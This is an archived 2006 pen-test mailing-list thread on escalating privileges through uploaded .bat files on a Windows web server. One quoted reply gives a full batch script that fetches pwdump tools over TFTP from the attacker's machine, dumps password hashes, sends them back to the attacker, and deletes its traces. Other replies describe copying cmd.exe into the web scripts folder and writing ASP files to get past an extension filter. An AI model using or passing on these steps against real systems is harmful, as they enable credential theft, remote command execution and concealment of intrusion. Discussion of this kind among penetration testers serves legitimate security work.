RE: privelege escalation with .bat files

From: Ben Greenberg (bengreenb@hotmail.com)
Date: Thu Apr 27 2006 - 14:10:20 EDT


One quick comment. My problem was that I couldn't execute the bat files,
and was looking to see if I could post to them(i finally found a seperate
solution). My suggestion to anyone who CAN execute bat files is the
following, even simpler solution, to getting a command prompt:

copy C:/windows/system32/cmd.exe C:/inetpub/scripts/

>From there, you can post commands to cmd.exe through the method explained in
the paper "One way web hacking".

Peace,

Urthogie

>From: Rich <rlandrig@optonline.net>
>To: 'Maudite' <maudite.mlrl@gmail.com>, pen-test@securityfocus.com
>Subject: RE: privelege escalation with .bat files
>Date: Thu, 27 Apr 2006 09:05:26 -0400
>
>Not only will I not laugh,, I thank you for sharing this with all of us in
>this group. Simplicity in itself is excellence, and you have shown a very
>elegant method to us all that now, we can utilize with efficiency.
>
>Thanks again
>rich
>
>-----Original Message-----
>From: Maudite [mailto:maudite.mlrl@gmail.com]
>Sent: Wednesday, April 26, 2006 9:50 PM
>To: pen-test@securityfocus.com
>Subject: RE: privelege escalation with .bat files
>
>Keep it simple.
>If you can upload and execute a .bat, I use the following a lot with
>metasploit and other items I can get on a machine with. I steal the
>password
>file with pwdump.
>
>
>If you want to upload other items just edit the following for what you want
>to upload (nc, adduser, shell code, root kit...). Save yourself time and
>have the script start and stop everything.
>
>Run a tftp server on your attack machine. I use VM ware a lot so I will
>have
>a linux iso in vm and win running as the base. So I have been using
>tftpd32g. Upload and execute the following. (not a windows guy don't laugh
>at my simple bat)
>
>Winpassword.bat
>_BEGIN
>
>call tftp -i [YOUR attack machine IP HERE] pwdump2.exe
>call tftp -i [YOUR attack machine IP HERE] GET samdump.dll
>call pwdump2.exe >password.txt
>call tftp -i [YOUR attack machine IP HERE] PUT password.txt
>call del /F pwdump2.exe
>call del /F samdump.dll
>call del /F password.txt
>call del /F TFT*
>call del /F winpassword.bat
>call cls
>
>_END
>
>tftpd is on most boxes.
>
>This one uploads, steals the password file (dump then download), then
>deletes itself and ends. On and off in seconds. Then use
>John/l0pht/rainbows
>to pop the passwords. Login.
>
>- Maudite
>maudite.mutantlogic.net
>This must mean something to some one: CISSP/CEH/CISA/.....
>
>-----Original Message-----
>From: Michael Hendrickx [mailto:michael@scanit.net]
>Sent: Wednesday, April 26, 2006 12:58 AM
>To: pen-test@securityfocus.com
>Subject: Re: privelege escalation with .bat files
>
> > However, its also set up to deny copying (or renaming to) of the
>following
>
> > file extensions .asp, .com, .cmd, .exe, and .dll. Interestingly, it does
> > allow .bat files to be written onto the server.
>
>Can't you make a .ASP file through the bat file? (echo "<%" >
>file.asp). When the bat is executed, it's -I think- done locally, and
>the ASP file can be created.. Then you can make a knock-off of
>aspcmd.asp or something.
>
>Just a thought,
>Michael
>
>--
> Michael Hendrickx, CISSP, SCTA
> Sr Security Engineer
> Scanit FZ / LLC
> http://www.scanit.net
>
> **********************************************************************
> This e-mail and attached files are confidential. If you are not the
> designated recipient, any disclosure, reproduction, copying,
> distribution, or other dissemination or use of this communication is
> strictly prohibited. If you have received this transmission in error
> please notify the sender immediately and then delete this e-mail.
> **********************************************************************
>
>----------------------------------------------------------------------------
>--
>This List Sponsored by: Cenzic
>
>Concerned about Web Application Security?
>Why not go with the #1 solution - Cenzic, the only one to win the Analyst's
>Choice Award from eWeek. As attacks through web applications continue to
>rise,
>you need to proactively protect your applications from hackers. Cenzic has
>the
>most comprehensive solutions to meet your application security penetration
>testing and vulnerability management needs. You have an option to go with a
>managed service (Cenzic ClickToSecure) or an enterprise software
>(Cenzic Hailstorm). Download FREE whitepaper on how a managed service can
>help you: http://www.cenzic.com/news_events/wpappsec.php
>And, now for a limited time we can do a FREE audit for you to confirm your
>results from other product. Contact us at request@cenzic.com for details.
>----------------------------------------------------------------------------
>--
>
>
>----------------------------------------------------------------------------
>--
>This List Sponsored by: Cenzic
>
>Concerned about Web Application Security?
>Why not go with the #1 solution - Cenzic, the only one to win the Analyst's
>Choice Award from eWeek. As attacks through web applications continue to
>rise,
>you need to proactively protect your applications from hackers. Cenzic has
>the
>most comprehensive solutions to meet your application security penetration
>testing and vulnerability management needs. You have an option to go with a
>managed service (Cenzic ClickToSecure) or an enterprise software
>(Cenzic Hailstorm). Download FREE whitepaper on how a managed service can
>help you: http://www.cenzic.com/news_events/wpappsec.php
>And, now for a limited time we can do a FREE audit for you to confirm your
>results from other product. Contact us at request@cenzic.com for details.
>----------------------------------------------------------------------------
>--
>
>
>
>--
>No virus found in this incoming message.
>Checked by AVG Free Edition.
>Version: 7.1.385 / Virus Database: 268.4.6/324 - Release Date: 4/25/2006
>
>
>
>------------------------------------------------------------------------------
>This List Sponsored by: Cenzic
>
>Concerned about Web Application Security?
>Why not go with the #1 solution - Cenzic, the only one to win the Analyst's
>Choice Award from eWeek. As attacks through web applications continue to
>rise,
>you need to proactively protect your applications from hackers. Cenzic has
>the
>most comprehensive solutions to meet your application security penetration
>testing and vulnerability management needs. You have an option to go with a
>managed service (Cenzic ClickToSecure) or an enterprise software
>(Cenzic Hailstorm). Download FREE whitepaper on how a managed service can
>help you: http://www.cenzic.com/news_events/wpappsec.php
>And, now for a limited time we can do a FREE audit for you to confirm your
>results from other product. Contact us at request@cenzic.com for details.
>------------------------------------------------------------------------------
>

------------------------------------------------------------------------------
This List Sponsored by: Cenzic

Concerned about Web Application Security?
Why not go with the #1 solution - Cenzic, the only one to win the Analyst's
Choice Award from eWeek. As attacks through web applications continue to rise,
you need to proactively protect your applications from hackers. Cenzic has the
most comprehensive solutions to meet your application security penetration
testing and vulnerability management needs. You have an option to go with a
managed service (Cenzic ClickToSecure) or an enterprise software
(Cenzic Hailstorm). Download FREE whitepaper on how a managed service can
help you: http://www.cenzic.com/news_events/wpappsec.php
And, now for a limited time we can do a FREE audit for you to confirm your
results from other product. Contact us at request@cenzic.com for details.
------------------------------------------------------------------------------



This archive was generated by hypermail 2.1.7 : Sat Apr 12 2008 - 10:55:53 EDT